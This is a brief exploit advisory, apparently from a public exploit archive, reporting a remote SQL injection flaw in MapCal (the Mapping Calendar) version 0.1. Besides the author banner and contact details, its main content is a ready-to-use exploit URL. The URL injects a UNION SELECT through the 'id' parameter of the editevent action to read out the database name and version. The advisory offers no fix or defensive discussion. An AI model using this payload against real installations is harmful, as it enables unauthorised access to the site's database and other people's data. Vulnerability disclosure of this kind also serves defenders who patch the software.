MapCal (the Mapping Calendar) version 0.1 suffers from a remote SQL injection vulnerability.
6bbed34883ea79f1439079bc7e55c61c4ca00dcafca91c3371f0f2a7d7933ed9
_____ ____ _____
/ _ \ /\ /\ / _ \ / _ \
| | | | \ \/ / ||_| | | | | |
| | | | \ / \_ | | | | |
| |_| | / \ __\ | | |_| |
\_____/ / /\ \ |____/ \_____/
\/ \/
[~] MapCal - The Mapping Calendar (v. 0.1) Remote SQL Injection
[~] Author: 0x90
[~] HomePage: www.0x90.com.ar
[~] Contact: Guns[at]0x90[dot]com[dot]ar
[~] Script: MapCal - The Mapping Calendar
[~] site: https://mapcal.sourceforge.net
[~] Vulnerability Class: SQL Injection
[~] Exploit:
https://localhost/cms/index.php?action=editevent&id=-0x90+union+select+0x90,0x90,0x90,concat(0x3a,database(),0x3a,version()),0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90+from+events